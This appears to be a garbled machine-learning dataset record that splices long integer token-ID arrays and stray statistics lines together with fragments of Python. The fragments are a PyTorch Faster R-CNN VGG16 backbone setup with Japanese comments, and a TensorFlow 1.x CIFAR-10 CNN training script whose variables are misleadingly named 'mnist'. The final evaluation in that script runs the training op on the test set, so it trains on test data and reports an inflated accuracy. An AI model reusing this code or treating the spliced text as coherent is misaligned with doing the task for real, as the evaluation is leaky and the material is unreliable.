22915,
796,
360,
1072,
7,
16,
11,
14916,
28,
705,
82,
17225,
1868,
6,
1267,
7,
30342,
18,
8,
198,
198,
19849,
796,
9104,
7,
15414,
82,
28,
23504,
11,
23862,
28,
22915,
8,
198,
2,
35743,
11685,
198,
19849,
13,
49736,
3419,
198,
2,
7110,
4823,
198,
2,
7110,
62,
19849,
7,
19849,
11,
284,
62,
7753,
28,
705,
4029,
79,
62,
34960,
13,
11134,
6,
1267,
198
] | 3.241877 | 277 |
#%%
# 画像・バウンディングボックス・ラベルのセットを準備する
import torch
import torch.nn as nn
image = torch.zeros((1, 3, 800, 800)).float()
bbox = torch.FloatTensor([[20, 30, 400, 500], [300, 400, 500, 600]]) # [y1, x1, y2, x2] format
labels = torch.LongTensor([6, 8]) # 0 represents background
sub_sample = 16
#%%
# VGG16を、バックボーンに使用する
# VGG16の出力特徴マップのサイズが 800//16 = 50 になるよう、小細工をする
import torchvision
dummy_img = torch.zeros((1, 3, 800, 800)).float()
model = torchvision.models.vgg16(pretrained=False)
vgg_layers = list(model.features)
req_features = []
k = dummy_img.clone()
for i in vgg_layers:
k = i(k)
if k.size()[2] < 800//16:
break
req_features.append(i)
out_channels = k.size()[1]
# 特徴量抽出器の完成
faster_rcnn_fe_extractor = nn.Sequential(*req_features) | [
2,
16626,
198,
198,
2,
13328,
242,
119,
161,
225,
237,
4707,
29659,
16165,
6527,
40629,
6527,
26095,
1209,
250,
35702,
8943,
4707,
9263,
35604,
9202,
5641,
47271,
35799,
31758,
162,
118,
244,
43636,
247,
33623,
25748,
198,
198,
11748,
28034,
198,
11748,
28034,
13,
20471,
355,
299,
77,
198,
9060,
796,
28034,
13,
9107,
418,
19510,
16,
11,
513,
11,
10460,
11,
10460,
29720,
22468,
3419,
198,
198,
65,
3524,
796,
28034,
13,
43879,
51,
22854,
26933,
58,
1238,
11,
1542,
11,
7337,
11,
5323,
4357,
685,
6200,
11,
7337,
11,
5323,
11,
10053,
11907,
8,
1303,
685,
88,
16,
11,
2124,
16,
11,
331,
17,
11,
2124,
17,
60,
5794,
198,
23912,
1424,
796,
28034,
13,
14617,
51,
22854,
26933,
21,
11,
807,
12962,
1303,
657,
6870,
4469,
198,
7266,
62,
39873,
796,
1467,
198,
198,
2,
16626,
198,
198,
2,
569,
11190,
1433,
31758,
23513,
29659,
35702,
1209,
250,
31708,
28618,
45635,
18796,
101,
33623,
25748,
198,
2,
569,
11190,
1433,
15474,
229,
118,
27950,
249,
31965,
117,
36181,
112,
20115,
14777,
30965,
5641,
26503,
11482,
37426,
35585,
10460,
1003,
1433,
796,
2026,
23294,
104,
26945,
25748,
1792,
230,
29557,
23513,
22887,
237,
163,
112,
108,
32432,
98,
31758,
33623,
25748,
198,
198,
11748,
28034,
10178,
198,
198,
67,
13513,
62,
9600,
796,
28034,
13,
9107,
418,
19510,
16,
11,
513,
11,
10460,
11,
10460,
29720,
22468,
3419,
198,
19849,
796,
28034,
10178,
13,
27530,
13,
85,
1130,
1433,
7,
5310,
13363,
28,
25101,
8,
198,
85,
1130,
62,
75,
6962,
796,
1351,
7,
19849,
13,
40890,
8,
198,
198,
42180,
62,
40890,
796,
17635,
198,
74,
796,
31548,
62,
9600,
13,
21018,
3419,
198,
1640,
1312,
287,
410,
1130,
62,
75,
6962,
25,
198,
220,
220,
220,
479,
796,
1312,
7,
74,
8,
198,
220,
220,
220,
611,
479,
13,
7857,
3419,
58,
17,
60,
1279,
10460,
1003,
1433,
25,
198,
220,
220,
220,
220,
220,
220,
220,
2270,
198,
220,
220,
220,
43089,
62,
40890,
13,
33295,
7,
72,
8,
198,
220,
220,
220,
503,
62,
354,
8961,
796,
479,
13,
7857,
3419,
58,
16,
60,
198,
198,
2,
13328,
231,
117,
36181,
112,
34932,
237,
162,
232,
121,
49035,
118,
161,
247,
101,
49149,
234,
22755,
238,
198,
69,
1603,
62,
6015,
20471,
62,
5036,
62,
2302,
40450,
796,
299,
77,
13,
44015,
1843,
46491,
42180,
62,
40890,
8
] | 1.934177 | 395 |
import csv
| [
11748,
269,
21370,
628
] | 3 | 4 |
#@title datasets_tutorials(cifar-10) { display-mode: "both" }
# conding: utf-8
import tensorflow as tf
from tensorflow.examples.tutorials.mnist import input_data
# from functools import reduce
import tensorflow_datasets as tfds
import numpy as np
import time
# tf.logging.set_verbosity(tf.logging.ERROR)
if __name__ == '__main__':
# filepath = '/content/GoogleDrive/Python27/MNIST_data'
# # filepath = r'E:\Anaconda2\Programs\MNIST_data'
# mnist = input_data.read_data_sets(filepath, one_hot=True)
# mnist_train = tfds.load("mnist", split=tfds.Split.TRAIN)
mnist_train = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TRAIN, batch_size=-1))
imgs_train, labels_train = mnist_train['image'].reshape(-1, 3072) / 255., mnist_train['label']
# imgs_train, labels_train = tf.reshape(mnist_train['image'], shape=[-1, 784]), tf.one_hot(mnist_train['label'], depth=10)
mnist_test = tfds.as_numpy(tfds.load("cifar10", split=tfds.Split.TEST, batch_size=-1))
# mnist_test = tfds.load("mnist", split=tfds.Split.TEST, batch_size=-1)
imgs_test, labels_test = mnist_test['image'].reshape(-1, 3072) / 255., mnist_test['label']
learning_rate = 3e-4 #@param {type:"number"}
batch_size = 256 #@param {type:"integer"}
num_epochs = 80 #@param {type:"integer"}
graph = tf.Graph()
with graph.as_default():
x = tf.placeholder(tf.float32, shape=[None, 3072])
y_p = tf.placeholder(tf.int64, shape=[None, ])
y = tf.one_hot(y_p, depth=10)
keep_pro = tf.placeholder(tf.float32)
x_imgs = tf.reshape(x, shape=[-1, 32, 32, 3], name='input_images')
w_1 = tf.Variable(tf.truncated_normal([3, 3, 3, 64], stddev=0.1), name='weights_conv1')
b_1 = tf.Variable(tf.constant(0.1, shape=[64]), name='bias_conv1')
h_conv1 = tf.nn.relu(tf.nn.conv2d(x_imgs, w_1, strides=[1, 1, 1, 1], padding='SAME') + b_1)
h_pool1 = tf.nn.max_pool(h_conv1, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
w_2 = tf.Variable(tf.truncated_normal([3, 3, 64, 128], stddev=0.1), name='weights_conv2')
b_2 = tf.Variable(tf.constant(0.1, shape=[128]), name='bias_conv2')
h_conv2 = tf.nn.relu(tf.nn.conv2d(h_pool1, w_2, strides=[1, 1, 1, 1], padding='SAME') + b_2)
h_pool2 = tf.nn.max_pool(h_conv2, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')
# layer_shape = h_pool2.get_shape().as_list()
# num_f = reduce(lambda a,b:a * b, layer_shape[1:])
# h_pool2_fla = tf.reshape(h_pool2, shape=[-1, num_f])
h_pool2_fla = tf.layers.flatten(h_pool2)
num_f = h_pool2_fla.get_shape().as_list()[-1]
w_fc1 = tf.Variable(tf.truncated_normal([num_f, 256], stddev=0.1), name='weights_fc1')
b_fc1 = tf.Variable(tf.constant(0.1, shape=[256]), name='bias_fc1')
h_fc1 = tf.nn.relu(tf.matmul(h_pool2_fla, w_fc1) + b_fc1)
h_drop1 = tf.nn.dropout(h_fc1, keep_prob=keep_pro, name='Dropout')
w_fc2 = tf.Variable(tf.truncated_normal([256, 10], stddev=0.1), name='weights_fc2')
b_fc2 = tf.Variable(tf.constant(0.1, shape=[10]), name='bias_fc2')
h_fc2 = tf.matmul(h_drop1, w_fc2) + b_fc2
# tf.add_to_collection(tf.GraphKeys.WEIGHTS, w_fc1)
# regularizer = tf.contrib.layers.l2_regularizer(scale=1500./60000)
# reg_tem = tf.contrib.layers.apply_regularization(regularizer)
with tf.name_scope('loss'):
entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2))
# entropy_loss = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(labels=y, logits=h_fc2) + reg_tem)
with tf.name_scope('accuracy'):
prediction = tf.cast(tf.equal(tf.arg_max(h_fc2, 1), tf.argmax(y, 1)), "float")
accuracy = tf.reduce_mean(prediction)
with tf.name_scope('train'):
optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate)
train_op = optimizer.minimize(entropy_loss)
sess = tf.Session()
with sess.as_default():
sess.run(tf.global_variables_initializer())
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
for num in range(num_epochs):
# batch = mnist.train.next_batch(batch_size)
# batch_imgs, batch_labels = format_tran(mnist_train, batch_size=batch_size)
# imgs_train, labels_train = batch_imgs.reshape(-1, 784), batch_labels
imgs_data = np.c_[imgs_train, labels_train]
np.random.shuffle(imgs_data)
num_batchs = imgs_train.shape[0] // batch_size
start = time.time()
for num_ep in range(num_batchs):
# start = time.time()
imgs_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size, :-1]
labels_batch = imgs_data[num_ep*batch_size:(num_ep+1)*batch_size,-1]
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_batch,
y_p: labels_batch,
keep_pro: 0.5})
end = time.time()
acc *= 100
num_e = str(num + 1)
print_list = [num_e, loss, acc]
print("Epoch {0[0]}, train_loss is {0[1]:.4f}, accuracy is {0[2]:.2f}%.".format(print_list))
print("Running time is {0:.2f}s.".format(end-start))
_, acc, loss = sess.run([train_op, accuracy, entropy_loss], feed_dict={x: imgs_test,
y_p: labels_test,
keep_pro: 1.})
acc *= 100
print_list = [loss, acc]
print("Test_loss is {0[0]:.4f}, accuracy is {0[1]:.2f}%.".format(print_list))
sess.close() | [
2,
31,
7839,
40522,
62,
83,
44917,
82,
7,
66,
361,
283,
12,
940,
8,
1391,
3359,
12,
14171,
25,
366,
16885,
1,
1782,
198,
2,
1779,
278,
25,
3384,
69,
12,
23,
198,
11748,
11192,
273,
11125,
355,
48700,
198,
6738,
11192,
273,
11125,
13,
1069,
12629,
13,
83,
44917,
82,
13,
10295,
396,
1330,
5128,
62,
7890,
198,
2,
422,
1257,
310,
10141,
1330,
4646,
198,
11748,
11192,
273,
11125,
62,
19608,
292,
1039,
355,
48700,
9310,
198,
11748,
299,
32152,
355,
45941,
198,
11748,
640,
198,
198,
2,
48700,
13,
6404,
2667,
13,
2617,
62,
19011,
16579,
7,
27110,
13,
6404,
2667,
13,
24908,
8,
628,
198,
361,
11593,
3672,
834,
6624,
705,
834,
12417,
834,
10354,
198,
220,
220,
220,
1303,
2393,
6978,
796,
31051,
11299,
14,
11708,
24825,
14,
37906,
1983,
14,
39764,
8808,
62,
7890,
6,
198,
220,
220,
220,
1303,
1303,
2393,
6978,
796,
374,
6,
36,
7479,
2025,
330,
13533,
17,
59,
15167,
82,
59,
39764,
8808,
62,
7890,
6,
198,
220,
220,
220,
1303,
285,
77,
396,
796,
5128,
62,
7890,
13,
961,
62,
7890,
62,
28709,
7,
7753,
6978,
11,
530,
62,
8940,
28,
17821,
8,
198,
220,
220,
220,
1303,
285,
77,
396,
62,
27432,
796,
48700,
9310,
13,
2220,
7203,
10295,
396,
1600,
6626,
28,
27110,
9310,
13,
41205,
13,
51,
3861,
1268,
8,
198,
220,
220,
220,
285,
77,
396,
62,
27432,
796,
48700,
9310,
13,
292,
62,
77,
32152,
7,
27110,
9310,
13,
2220,
7203,
66,
361,
283,
940,
1600,
6626,
28,
27110,
9310,
13,
41205,
13,
51,
3861,
1268,
11,
15458,
62,
7857,
10779,
16,
4008,
198,
220,
220,
220,
545,
14542,
62,
27432,
11,
14722,
62,
27432,
796,
285,
77,
396,
62,
27432,
17816,
9060,
6,
4083,
3447,
1758,
32590,
16,
11,
1542,
4761,
8,
1220,
14280,
1539,
285,
77,
396,
62,
27432,
17816,
18242,
20520,
198,
220,
220,
220,
1303,
545,
14542,
62,
27432,
11,
14722,
62,
27432,
796,
48700,
13,
3447,
1758,
7,
10295,
396,
62,
27432,
17816,
9060,
6,
4357,
5485,
41888,
12,
16,
11,
767,
5705,
46570,
48700,
13,
505,
62,
8940,
7,
10295,
396,
62,
27432,
17816,
18242,
6,
4357,
6795,
28,
940,
8,
628,
220,
220,
220,
285,
77,
396,
62,
9288,
796,
48700,
9310,
13,
292,
62,
77,
32152,
7,
27110,
9310,
13,
2220,
7203,
66,
361,
283,
940,
1600,
6626,
28,
27110,
9310,
13,
41205,
13,
51,
6465,
11,
15458,
62,
7857,
10779,
16,
4008,
198,
220,
220,
220,
1303,
285,
77,
396,
62,
9288,
796,
48700,
9310,
13,
2220,
7203,
10295,
396,
1600,
6626,
28,
27110,
9310,
13,
41205,
13,
51,
6465,
11,
15458,
62,
7857,
10779,
16,
8,
198,
220,
220,
220,
545,
14542,
62,
9288,
11,
14722,
62,
9288,
796,
285,
77,
396,
62,
9288,
17816,
9060,
6,
4083,
3447,
1758,
32590,
16,
11,
1542,
4761,
8,
1220,
14280,
1539,
285,
77,
396,
62,
9288,
17816,
18242,
20520,
628,
220,
220,
220,
4673,
62,
4873,
796,
513,
68,
12,
19,
1303,
31,
17143,
1391,
4906,
11097,
17618,
20662,
198,
220,
220,
220,
15458,
62,
7857,
796,
17759,
1303,
31,
17143,
1391,
4906,
11097,
41433,
20662,
198,
220,
220,
220,
997,
62,
538,
5374,
82,
796,
4019,
1303,
31,
17143,
1391,
4906,
11097,
41433,
20662,
628,
220,
220,
220,
4823,
796,
48700,
13,
37065,
3419,
198,
220,
220,
220,
351,
4823,
13,
292,
62,
12286,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
2124,
796,
48700,
13,
5372,
13829,
7,
27110,
13,
22468,
2624,
11,
5485,
41888,
14202,
11,
1542,
4761,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
331,
62,
79,
796,
48700,
13,
5372,
13829,
7,
27110,
13,
600,
2414,
11,
5485,
41888,
14202,
11,
33761,
198,
220,
220,
220,
220,
220,
220,
220,
331,
796,
48700,
13,
505,
62,
8940,
7,
88,
62,
79,
11,
6795,
28,
940,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1394,
62,
1676,
796,
48700,
13,
5372,
13829,
7,
27110,
13,
22468,
2624,
8,
628,
220,
220,
220,
220,
220,
220,
220,
2124,
62,
9600,
82,
796,
48700,
13,
3447,
1758,
7,
87,
11,
5485,
41888,
12,
16,
11,
3933,
11,
3933,
11,
513,
4357,
1438,
11639,
15414,
62,
17566,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
266,
62,
16,
796,
48700,
13,
43015,
7,
27110,
13,
2213,
19524,
515,
62,
11265,
26933,
18,
11,
513,
11,
513,
11,
5598,
4357,
336,
1860,
1990,
28,
15,
13,
16,
828,
1438,
11639,
43775,
62,
42946,
16,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
275,
62,
16,
796,
48700,
13,
43015,
7,
27110,
13,
9979,
415,
7,
15,
13,
16,
11,
5485,
41888,
2414,
46570,
1438,
11639,
65,
4448,
62,
42946,
16,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
289,
62,
42946,
16,
796,
48700,
13,
20471,
13,
260,
2290,
7,
27110,
13,
20471,
13,
42946,
17,
67,
7,
87,
62,
9600,
82,
11,
266,
62,
16,
11,
35002,
41888,
16,
11,
352,
11,
352,
11,
352,
4357,
24511,
11639,
50,
10067,
11537,
1343,
275,
62,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
289,
62,
7742,
16,
796,
48700,
13,
20471,
13,
9806,
62,
7742,
7,
71,
62,
42946,
16,
11,
479,
7857,
41888,
16,
11,
362,
11,
362,
11,
352,
4357,
35002,
41888,
16,
11,
362,
11,
362,
11,
352,
4357,
24511,
11639,
50,
10067,
11537,
628,
220,
220,
220,
220,
220,
220,
220,
266,
62,
17,
796,
48700,
13,
43015,
7,
27110,
13,
2213,
19524,
515,
62,
11265,
26933,
18,
11,
513,
11,
5598,
11,
13108,
4357,
336,
1860,
1990,
28,
15,
13,
16,
828,
1438,
11639,
43775,
62,
42946,
17,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
275,
62,
17,
796,
48700,
13,
43015,
7,
27110,
13,
9979,
415,
7,
15,
13,
16,
11,
5485,
41888,
12762,
46570,
1438,
11639,
65,
4448,
62,
42946,
17,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
289,
62,
42946,
17,
796,
48700,
13,
20471,
13,
260,
2290,
7,
27110,
13,
20471,
13,
42946,
17,
67,
7,
71,
62,
7742,
16,
11,
266,
62,
17,
11,
35002,
41888,
16,
11,
352,
11,
352,
11,
352,
4357,
24511,
11639,
50,
10067,
11537,
1343,
275,
62,
17,
8,
198,
220,
220,
220,
220,
220,
220,
220,
289,
62,
7742,
17,
796,
48700,
13,
20471,
13,
9806,
62,
7742,
7,
71,
62,
42946,
17,
11,
479,
7857,
41888,
16,
11,
362,
11,
362,
11,
352,
4357,
35002,
41888,
16,
11,
362,
11,
362,
11,
352,
4357,
24511,
11639,
50,
10067,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
7679,
62,
43358,
796,
289,
62,
7742,
17,
13,
1136,
62,
43358,
22446,
292,
62,
4868,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
997,
62,
69,
796,
4646,
7,
50033,
257,
11,
65,
25,
64,
1635,
275,
11,
7679,
62,
43358,
58,
16,
25,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
289,
62,
7742,
17,
62,
2704,
64,
796,
48700,
13,
3447,
1758,
7,
71,
62,
7742,
17,
11,
5485,
41888,
12,
16,
11,
997,
62,
69,
12962,
198,
220,
220,
220,
220,
220,
220,
220,
289,
62,
7742,
17,
62,
2704,
64,
796,
48700,
13,
75,
6962,
13,
2704,
41769,
7,
71,
62,
7742,
17,
8,
198,
220,
220,
220,
220,
220,
220,
220,
997,
62,
69,
796,
289,
62,
7742,
17,
62,
2704,
64,
13,
1136,
62,
43358,
22446,
292,
62,
4868,
3419,
58,
12,
16,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
266,
62,
16072,
16,
796,
48700,
13,
43015,
7,
27110,
13,
2213,
19524,
515,
62,
11265,
26933,
22510,
62,
69,
11,
17759,
4357,
336,
1860,
1990,
28,
15,
13,
16,
828,
1438,
11639,
43775,
62,
16072,
16,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
275,
62,
16072,
16,
796,
48700,
13,
43015,
7,
27110,
13,
9979,
415,
7,
15,
13,
16,
11,
5485,
41888,
11645,
46570,
1438,
11639,
65,
4448,
62,
16072,
16,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
289,
62,
16072,
16,
796,
48700,
13,
20471,
13,
260,
2290,
7,
27110,
13,
6759,
76,
377,
7,
71,
62,
7742,
17,
62,
2704,
64,
11,
266,
62,
16072,
16,
8,
1343,
275,
62,
16072,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
289,
62,
14781,
16,
796,
48700,
13,
20471,
13,
14781,
448,
7,
71,
62,
16072,
16,
11,
1394,
62,
1676,
65,
28,
14894,
62,
1676,
11,
1438,
11639,
26932,
448,
11537,
628,
220,
220,
220,
220,
220,
220,
220,
266,
62,
16072,
17,
796,
48700,
13,
43015,
7,
27110,
13,
2213,
19524,
515,
62,
11265,
26933,
11645,
11,
838,
4357,
336,
1860,
1990,
28,
15,
13,
16,
828,
1438,
11639,
43775,
62,
16072,
17,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
275,
62,
16072,
17,
796,
48700,
13,
43015,
7,
27110,
13,
9979,
415,
7,
15,
13,
16,
11,
5485,
41888,
940,
46570,
1438,
11639,
65,
4448,
62,
16072,
17,
11537,
198,
220,
220,
220,
220,
220,
220,
220,
289,
62,
16072,
17,
796,
48700,
13,
6759,
76,
377,
7,
71,
62,
14781,
16,
11,
266,
62,
16072,
17,
8,
1343,
275,
62,
16072,
17,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
48700,
13,
2860,
62,
1462,
62,
43681,
7,
27110,
13,
37065,
40729,
13,
8845,
34874,
11,
266,
62,
16072,
16,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
3218,
7509,
796,
48700,
13,
3642,
822,
13,
75,
6962,
13,
75,
17,
62,
16338,
7509,
7,
9888,
28,
33698,
19571,
21,
2388,
8,
198,
220,
220,
220,
220,
220,
220,
220,
1303,
842,
62,
11498,
796,
48700,
13,
3642,
822,
13,
75,
6962,
13,
39014,
62,
16338,
1634,
7,
16338,
7509,
8,
628,
220,
220,
220,
220,
220,
220,
220,
351,
48700,
13,
3672,
62,
29982,
10786,
22462,
6,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
40709,
62,
22462,
796,
48700,
13,
445,
7234,
62,
32604,
7,
27110,
13,
20471,
13,
4215,
9806,
62,
19692,
62,
298,
28338,
62,
4480,
62,
6404,
896,
7,
23912,
1424,
28,
88,
11,
2604,
896,
28,
71,
62,
16072,
17,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
40709,
62,
22462,
796,
48700,
13,
445,
7234,
62,
32604,
7,
27110,
13,
20471,
13,
4215,
9806,
62,
19692,
62,
298,
28338,
62,
4480,
62,
6404,
896,
7,
23912,
1424,
28,
88,
11,
2604,
896,
28,
71,
62,
16072,
17,
8,
1343,
842,
62,
11498,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
351,
48700,
13,
3672,
62,
29982,
10786,
4134,
23843,
6,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
17724,
796,
48700,
13,
2701,
7,
27110,
13,
40496,
7,
27110,
13,
853,
62,
9806,
7,
71,
62,
16072,
17,
11,
352,
828,
48700,
13,
853,
9806,
7,
88,
11,
352,
36911,
366,
22468,
4943,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
9922,
796,
48700,
13,
445,
7234,
62,
32604,
7,
28764,
2867,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
198,
220,
220,
220,
220,
220,
220,
220,
351,
48700,
13,
3672,
62,
29982,
10786,
27432,
6,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
6436,
7509,
796,
48700,
13,
27432,
13,
23159,
27871,
320,
7509,
7,
40684,
62,
4873,
28,
40684,
62,
4873,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4512,
62,
404,
796,
6436,
7509,
13,
1084,
48439,
7,
298,
28338,
62,
22462,
8,
628,
220,
220,
220,
220,
220,
220,
220,
264,
408,
796,
48700,
13,
36044,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
351,
264,
408,
13,
292,
62,
12286,
33529,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
264,
408,
13,
5143,
7,
27110,
13,
20541,
62,
25641,
2977,
62,
36733,
7509,
28955,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
15458,
62,
9600,
82,
11,
15458,
62,
23912,
1424,
796,
5794,
62,
2213,
272,
7,
10295,
396,
62,
27432,
11,
15458,
62,
7857,
28,
43501,
62,
7857,
8,
628,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
997,
287,
2837,
7,
22510,
62,
538,
5374,
82,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
15458,
796,
285,
77,
396,
13,
27432,
13,
19545,
62,
43501,
7,
43501,
62,
7857,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
15458,
62,
9600,
82,
11,
15458,
62,
23912,
1424,
796,
5794,
62,
2213,
272,
7,
10295,
396,
62,
27432,
11,
15458,
62,
7857,
28,
43501,
62,
7857,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
545,
14542,
62,
27432,
11,
14722,
62,
27432,
796,
15458,
62,
9600,
82,
13,
3447,
1758,
32590,
16,
11,
767,
5705,
828,
15458,
62,
23912,
1424,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
545,
14542,
62,
7890,
796,
45941,
13,
66,
62,
58,
9600,
82,
62,
27432,
11,
14722,
62,
27432,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
45941,
13,
25120,
13,
1477,
18137,
7,
9600,
82,
62,
7890,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
997,
62,
43501,
82,
796,
545,
14542,
62,
27432,
13,
43358,
58,
15,
60,
3373,
15458,
62,
7857,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
923,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
329,
997,
62,
538,
287,
2837,
7,
22510,
62,
43501,
82,
2599,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1303,
923,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
545,
14542,
62,
43501,
796,
545,
14542,
62,
7890,
58,
22510,
62,
538,
9,
43501,
62,
7857,
37498,
22510,
62,
538,
10,
16,
27493,
43501,
62,
7857,
11,
1058,
12,
16,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
14722,
62,
43501,
796,
545,
14542,
62,
7890,
58,
22510,
62,
538,
9,
43501,
62,
7857,
37498,
22510,
62,
538,
10,
16,
27493,
43501,
62,
7857,
12095,
16,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
11,
697,
11,
2994,
796,
264,
408,
13,
5143,
26933,
27432,
62,
404,
11,
9922,
11,
40709,
62,
22462,
4357,
3745,
62,
11600,
34758,
87,
25,
545,
14542,
62,
43501,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
331,
62,
79,
25,
14722,
62,
43501,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
1394,
62,
1676,
25,
657,
13,
20,
30072,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
886,
796,
640,
13,
2435,
3419,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
697,
1635,
28,
1802,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
997,
62,
68,
796,
965,
7,
22510,
1343,
352,
8,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
62,
4868,
796,
685,
22510,
62,
68,
11,
2994,
11,
697,
60,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
13807,
5374,
1391,
15,
58,
15,
60,
5512,
4512,
62,
22462,
318,
1391,
15,
58,
16,
5974,
13,
19,
69,
5512,
9922,
318,
1391,
15,
58,
17,
5974,
13,
17,
69,
92,
4,
526,
13,
18982,
7,
4798,
62,
4868,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
3601,
7203,
28768,
640,
318,
1391,
15,
25,
13,
17,
69,
92,
82,
526,
13,
18982,
7,
437,
12,
9688,
4008,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
4808,
11,
697,
11,
2994,
796,
264,
408,
13,
5143,
26933,
27432,
62,
404,
11,
9922,
11,
40709,
62,
22462,
4357,
3745,
62,
11600,
34758,
87,
25,
545,
14542,
62,
9288,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
331,
62,
79,
25,
14722,
62,
9288,
11,
198,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
220,
